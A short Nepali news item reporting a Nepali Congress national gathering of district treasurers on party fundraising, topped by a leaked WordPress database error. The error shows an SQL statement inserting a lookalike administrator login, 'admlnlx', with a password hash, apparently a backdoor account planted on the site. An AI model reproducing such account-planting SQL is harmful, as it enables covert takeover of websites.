WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8OB8yKRCC1cf.h4kzKGw79uDxpkTq0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:13:17', '', 'admlnlx', 'admlnlx')
काठमाडौं ,पुस ८-
नेपाली कांग्रेसका जिल्ला कोषाध्यक्षको प्रथम राष्ट्रिय भेला शुक्रबारदेखि काठमाडौंमा हुँदैछ।
संस्थापक नेता कृष्णप्रसाद भट्टराईको ९३ औं जन्मजयन्तीका अवसरमा राष्ट्रिय सभागृहमा आयोजित भेलाको पार्टी सभापति शेरबहादुर देउवाले उद्घाटन गर्नेछन्। पार्टी सञ्चालनका लागि लेवीको व्यवस्थालाई थप व्यवस्थित बनाउने, राष्ट्रिय र अन्तर्राष्ट्रियस्तरमा हुने गरेका आर्थिक व्यवस्थापनको बारेमा बृहत छलफल गर्ने उद्देश्यले भेला गर्न लागिएको हो।
पार्टी कोष निर्माणका लागि सञ्चालन गरिएका चन्दा अभियान, चन्दा दातालाई दिइएको दबाब, त्यसको दुरूपयोग र अपारदर्शीताका कारण पार्टी र नेता समेत बदनाम भएको हुँदा त्यसको निराकरणका लागि भेला गर्न लागिएको संयोजक गोविन्द पुडासैनीले बताए। भेलाले आगामी चुनावमा पार्टीलाई अझ सशक्त र बलियो बनाउन व्यवस्थित र पारदर्शी कोष निर्माणका लागि सहयोग पुर्याउने पुडासैनीले बताए। भेला काठमाडौमा घोषणापत्र जारी गर्दै शनिबार सकिनेछ।